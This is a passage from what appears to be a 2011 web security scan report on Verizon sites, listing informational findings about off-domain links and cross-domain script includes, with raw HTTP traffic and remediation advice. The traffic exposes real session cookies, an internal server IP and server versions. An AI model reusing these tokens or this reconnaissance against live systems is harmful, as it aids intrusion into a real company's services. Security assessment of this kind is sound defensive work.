Date: Mon, 05 Sep 2011 22:42:03 GMT
Connection: close

<div id="placeholder">
<input name="ctl00$hCSCUId" type="hidden" id="ctl00_hCSCUId" />
<input type="hidden" id="hdnCSDTV" name="hdnCSDTV" />
<div class="PadL10 CB">
<div id="ctl00_divhdrCS" c
...[SNIP]...
<div class="Fl Wid110 LkLnH" id="csDTV" style="display: none; width: 100px">
<a id="a1" href="http://support.directv.com/">Overview</a><br />
<a id="a2" href="http://www.directv.com/DTVAPP/epg/theGuide.jsp">Guide</a><br />
<a id="a3" href="http://www.directv.com/DTVAPP/content/equipment/receivers">Receivers</a><br />
<a id="a4" href="http://www.directv.com/DTVAPP/content/equipment/remotes">Remote Controls</a><br />
<a id="a5" href="http://www.directv.com/DTVAPP/content/equipment/accessories">Other
Hardware</a><br />
<a id="a6" href="http://support.directv.com/app/troubleshooting/p/21">Troubleshooting</a><br />
<a id="a7" href="http://www.directv.com/DTVAPP/content/contact_us">Contact Us</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://support.vzw.com/">Support</a></div><div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://support.vzw.com/phones/">Troubleshooting</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://support.vzw.com/phones/">Phone Manual</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://www.verizonwireless.com/multimedia/voicemail/vmdemo_v1/index.html">How to Use Voice Mail</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://support.vzw.com/features/view_all.html">How to Use Features</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://www.verizonwireless.com/b2c/accountholder/store/controller?item=addalineItem&action=displaysplash">Add a Line</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://www.verizonwireless.com/b2c/accountholder/store/controller?item=callingplanItem&action=displayMDN">Change Calling Plan</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do">Add/Change Features</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item6">How do I check my balance?</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item7">How do I check my minutes used?</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item8">How do I upgrade my equipment?</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item9">What do I do if my phone is lost or stolen?</a>
...[SNIP]...
<div class="txtDataMain" style="padding-left:23px;padding-top:3px;"><a CheckForLite="true" href="http://support.vzw.com/billing/top_questions.html#item10">How do I download ring tones?</a>
...[SNIP]...
<span class="linkTextNormal"><a CheckForLite="true" href="http://support.vzw.com/billing/?lid=//global//support//billing+and+account">More</a>
...[SNIP]...
<div class="LkLnH" id="divW" style="display: none">
<a href=http://community.vzw.com/t5/Other/QUESTION-ABOUT-CERTIFIED-PRE-OWNED/td-p/652419>QUESTION ABOUT CERTIFIED PRE-OWNED!</a><br><a href=http://community.vzw.com/t5/DROID-Charge-by-Samsung/Droid-Charge-Communication-errors-No-network-coverage/td-p/648943>Droid Charge - Communication errors No network coverage</a><br><a href=http://community.vzw.com/t5/Media-Store/QUESTION-ABOUT-SANDISK-MEMORY-CARDS-FOR-PHONES/td-p/652347>QUESTION ABOUT SANDISK MEMORY CARDS FOR PHONES!</a><br><a href=http://community.vzw.com/t5/ThunderBolt-by-HTC/Unknown-Caller/td-p/652341>Unknown Caller</a><br><a href=http://community.vzw.com/t5/iPhone-4/New-Apps-for-iphone4/td-p/650309>New Apps for iphone4</a><br><a href=http://community.vzw.com/t5/Media-Store/Default-Ringback-Tone-Won-t-Delete/td-p/648501>Default Ringback Tone Won't Delete!</a>
...[SNIP]...

15.47. http://www22.verizon.com/residential/fiostv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiostv

Issue detail

The page was loaded from a URL containing a query string:

http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057

The response contains the following links to other domains:

http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js
http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=fiost917;ord=1?
http://www.bbbonline.org/cks.asp?id=108072593112
http://www.thinkfinity.org/
http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101
http://www.verizonwireless.com/
http://www.verizonwireless.com/b2c/index.html
http://www.youtube.com/v/BeKPG_bfV7M?version=3&hl=en_US
http://www.youtube.com/v/e7VJmt0Nz7o?version=3&hl=en_US
http://www.youtube.com/v/yMzKLp3wyCs?version=3&hl=en_US
https://s7.addthis.com/js/250/addthis_widget.js

Request

GET /residential/fiostv?CMP=DMC-CV090057 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizon.com/fiostv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660; vsrecentsearches=wss~xss~xss%20sq~~

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 131188
Expires: Mon, 05 Sep 2011 22:18:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:18:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=CA; path=/
Set-Cookie: BTagRequired=; expires=Sat, 05-Sep-1981 22:18:31 GMT; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 04-Sep-2011 22:18:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<LI><A style="WIDTH: 63px" id=GHWireless title="Verizon Wireless" href="http://www.verizonwireless.com/" name=&lid=hp_wireless_tab>Wireless</A>
...[SNIP]...
<LI><A href="http://www.verizonwireless.com/b2c/index.html" name=&lid=overlay_phone_wireless><IMG alt="" src="/Content/Commonfiles/images/globalheader/new_header/i/wireless.gif">
...[SNIP]...
</DIV><EMBED height=385 type=application/x-shockwave-flash width=640 src=http://www.youtube.com/v/e7VJmt0Nz7o?version=3&hl=en_US allowscriptaccess="always" allowfullscreen="true"></DIV>
...[SNIP]...
</DIV><EMBED height=385 type=application/x-shockwave-flash width=640 src=http://www.youtube.com/v/BeKPG_bfV7M?version=3&hl=en_US allowscriptaccess="always" allowfullscreen="true"></DIV>
...[SNIP]...
</DIV><EMBED height=385 type=application/x-shockwave-flash width=640 src=http://www.youtube.com/v/yMzKLp3wyCs?version=3&hl=en_US allowscriptaccess="always" allowfullscreen="true"></DIV>
...[SNIP]...
<DIV class="col12 clear icons"><A href="http://www.bbbonline.org/cks.asp?id=108072593112" name=&lid=hp_res_footer_bbb_logo target=_blank><IMG alt="Click to verify BBB accreditation and to see a BBB report." src="/Content/LearnShop/Images/footer/bbb.jpg"></A><A href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" name=&lid=hp_res_footer_truste_logo target=_blank><IMG class=bright alt="Reviewed by TRUSTe site privacy statement." src="/Content/LearnShop/Images/footer/truste.jpg">
...[SNIP]...
<LI><A href="http://www.thinkfinity.org/">Verizon Thinkfinity</A>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=fiost917;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

<script type="text/javascript" src="http://d1qpxk1wfeh8v1.cloudfront.net/tags/tt16_1002.js"></script>
...[SNIP]...

15.48. https://www22.verizon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

https://www22.verizon.com/?lid=//global//residential

The response contains the following link to another domain:

https://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=1?

Request

GET /?lid=//global//residential HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 128679
Cache-Control: private, max-age=1800
Date: Mon, 05 Sep 2011 22:19:42 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head >
<title>Verizon | Broadband (DSL) Internet Service, Cable TV (Digital TV,
...[SNIP]...

<iframe src="https://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=1?" width="1" height="1"

frameborder="0"></iframe>
...[SNIP]...

15.49. https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/VZRepair/vziha/js/jslib.axd

Issue detail

The page was loaded from a URL containing a query string:

https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd?d=recaptcha_ajax.js&v=2.2.0

The response contains the following link to another domain:

https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

Request

GET /ForYourHome/VZRepair/vziha/js/jslib.axd?d=recaptcha_ajax.js&v=2.2.0 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 08 Oct 2010 19:50:14 GMT
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 25650
Expires: Mon, 05 Sep 2011 22:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:40 GMT
Connection: keep-alive

/*recaptcha_ajax.js*/

var RecaptchaTemplates={};RecaptchaTemplates.VertHtml='<table id="recaptcha_table" class="recaptchatable" > <tr> <td colspan="6" class=\'recaptcha_r1_c1\'></td> </tr> <tr> <td
...[SNIP]...
udioCaptchaHtml:function(){var a=Recaptcha,b=RecaptchaState,c=b.server+"image?c="+b.challenge;if(c.indexOf("https://")==0)c="http://"+c.substring(8);b=b.server+"/img/audiocaptcha.swf?v2";a=a._is_ie()?'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="audiocaptcha" width="0" height="0" codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="'+b+'" />
...[SNIP]...

16. Cross-domain script include previous next
There are 85 instances of this issue:

https://b2b.verizonwireless.com/b2b/commerce/privacy.go
http://b2b.vzw.com/industrysolutions/index.html
http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571455.html
http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571456.html
http://d1qpxk1wfeh8v1.cloudfront.net/tags/totaltagdefault.html
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248
http://gigaom.com/cloud/structure-50/
https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp
https://mblogin.verizonwireless.com/amserver/UI/Login
http://newscenter.verizon.com/404.html
http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1
http://phones.verizonwireless.com/htc/thunderbolt/
http://products.verizonwireless.com/index.aspx
http://search.verizon.com/
http://search.vzw.com/
http://shop.verizonwireless.com/
http://smallbusiness.verizon.com/
http://smallbusiness.verizon.com/products/voice/overview.aspx
http://smallbusiness.verizon.com/products/voice/plans.aspx
https://survey.qualtrics.com/SE/
http://www.addthis.com/bookmark.php
http://www.connecttoverizon.com/
http://www.connecttoverizon.com/loginFailed.html
http://www.connecttoverizon.com/order-now.html
http://www.darkreading.com/security/attacks/showArticle.jhtml
http://www.facebook.com/connect/prompt_feed.php
http://www.facebook.com/dialog/feed
http://www.verizonbusiness.com/Medium/about/promotions/first_6_months/
http://www.verizonbusiness.com/Medium/about/promotions/premium_data_center/
http://www.verizonbusiness.com/Medium/about/promotions/smp/
http://www.verizonbusiness.com/Medium/bundles/vsbb/
http://www.verizonbusiness.com/Medium/products/conferencing/
http://www.verizonbusiness.com/Medium/products/internet/ida/
http://www.verizonbusiness.com/Medium/products/managed/managed_mobility/
http://www.verizonbusiness.com/Medium/resources/vertical.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/
http://www.verizonbusiness.com/Medium/sign-in/vec/basic.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/essentials.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/igus.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/looking.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/voip.xml
http://www.verizonbusiness.com/Medium/sign-in/vec/wan.xml
http://www.verizonbusiness.com/about/ipinnovation/
http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
http://www.verizonbusiness.com/us/Products/networking/internet/ipv6/
http://www.verizonwireless.com/b2c/&hec=1&lid=//hp//p//100+Trade+In//Imp&hid=0.07034434005618095
http://www.verizonwireless.com/b2c/&hec=10&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.7112846237141639
http://www.verizonwireless.com/b2c/&hec=11&lid=//hp//p//100+Trade+In//Imp&hid=0.3314754036255181
http://www.verizonwireless.com/b2c/&hec=2&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.8891192970331758
http://www.verizonwireless.com/b2c/&hec=3&lid=//hp//p//Deals+Central//Imp&hid=0.5899386655073613
http://www.verizonwireless.com/b2c/&hec=4&lid=//hp//p//Back+To+School//Imp&hid=0.734757476951927
http://www.verizonwireless.com/b2c/&hec=5&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.5447121190372854
http://www.verizonwireless.com/b2c/&hec=6&lid=//hp//p//100+Trade+In//Imp&hid=0.9608070966787636
http://www.verizonwireless.com/b2c/&hec=7&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.20118952100165188
http://www.verizonwireless.com/b2c/&hec=8&lid=//hp//p//Deals+Central//Imp&hid=0.22915508295409381
http://www.verizonwireless.com/b2c/&hec=9&lid=//hp//p//Back+To+School//Imp&hid=0.48359646485187113
http://www.verizonwireless.com/b2c/CoverageLocatorController
http://www.verizonwireless.com/b2c/aboutUs/affiliate/index.jsp
http://www.verizonwireless.com/b2c/deviceFinder/index.jsp
http://www.verizonwireless.com/b2c/employee/emaildomainauthentication.jsp
http://www.verizonwireless.com/b2c/explore/
http://www.verizonwireless.com/b2c/index.html
http://www.verizonwireless.com/b2c/index.html
http://www.verizonwireless.com/b2c/promo/splash/ewp
http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
http://www.verizonwireless.com/b2c/store/&hec=1&cv.c13=session+timeout+alert&hid=0.12213333742693067
http://www.verizonwireless.com/b2c/store/&hec=2&cv.c13=session+alert+active&hid=0.4740242080297321
http://www.verizonwireless.com/b2c/store/accessory
http://www.verizonwireless.com/b2c/store/controller
http://www.verizonwireless.com/b2c/vzwfly
https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login
https://www.whitefence.com/WebObjects/WhiteFenceService.woa/wa/forgotPassword
http://www.youtube.com/results
http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm
http://www22.verizon.com/jobs/
http://www22.verizon.com/jobs/search-jobs
http://www22.verizon.com/jobs/verizon-wireless/search-jobs
http://www22.verizon.com/residential/fiostv
https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx
https://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

16.1. https://b2b.verizonwireless.com/b2b/commerce/privacy.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://b2b.verizonwireless.com
Path:	/b2b/commerce/privacy.go

Issue detail

The response dynamically includes the following scripts from other domains:

https://scache.vzw.com/mybiz/commerce/hbx/hbx.js
https://scache.vzw.com/mybiz/commerce/hbx/hbx_custom.js
https://scache.vzw.com/mybiz/commerce/hbx/hbx_default_header.js
https://scache.vzw.com/mybiz/commerce/javascript/common/ajaxOverlay.js
https://scache.vzw.com/mybiz/commerce/javascript/common/cookies.js
https://scache.vzw.com/mybiz/commerce/javascript/common/flashDetector.js
https://scache.vzw.com/mybiz/commerce/javascript/common/forms.js
https://scache.vzw.com/mybiz/commerce/javascript/common/vzw_commerce.js
https://scache.vzw.com/mybiz/core/scripts/lib.js
https://scache.vzw.com/mybiz/core/scripts/mootools.js
https://scache.vzw.com/mybiz/core/scripts/vzw_lib.js
https://scache.vzw.com/mybiz/selfservice/scripts/commerce.js
https://scache.vzw.com/mybiz/selfservice/scripts/rga_dd.js

Request

GET /b2b/commerce/privacy.go HTTP/1.1
Host: b2b.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:34:41 GMT
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="ALL DSP COR HISa OTPa OUR BUS UNI PUR COM NAV INT"
x-wily-servlet: Clear appServerIp=10.170.176.64&agentName=puma23&servletName=DispatcherServlet&agentHost=obswbbizzap65&agentProcess=COMM
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=3BBAAAFA0AAAB0403CD121F020CB8EFE
Content-Length: 40953

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="ht
...[SNIP]...
<meta http-equiv="cache-control" content="no-cache, must-revalidate"/>

<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/flashDetector.js"></script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/vzw_commerce.js"></script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/forms.js"></script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/cookies.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/javascript/common/ajaxOverlay.js"></script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/commerce/hbx/hbx_custom.js"></script>

<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/core/scripts/mootools.js"></script>


                       <script type="text/javascript"
           src="https://scache.vzw.com/mybiz/commerce/hbx/hbx_default_header.js"></script>


<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/selfservice/scripts/rga_dd.js"></script>
<script type="text/javascript"
   src="https://scache.vzw.com/mybiz/selfservice/scripts/commerce.js"></script>
...[SNIP]...
</div>


   <script type="text/javascript" defer="defer" src="https://scache.vzw.com/mybiz/core/scripts/lib.js"></script>
<script type="text/javascript" src="https://scache.vzw.com/mybiz/core/scripts/vzw_lib.js"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="https://scache.vzw.com/mybiz/commerce/hbx/hbx.js"></script>
...[SNIP]...

16.2. http://b2b.vzw.com/industrysolutions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b2b.vzw.com
Path:	/industrysolutions/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://www.verizonwireless.com/js/shared/hbx/hbx.js

Request

Response

16.3. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1qpxk1wfeh8v1.cloudfront.net
Path:	/tags/1234568496.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://cti.w55c.net/ct/ct-798466b25b8841b28752394c7d7a01b8.js
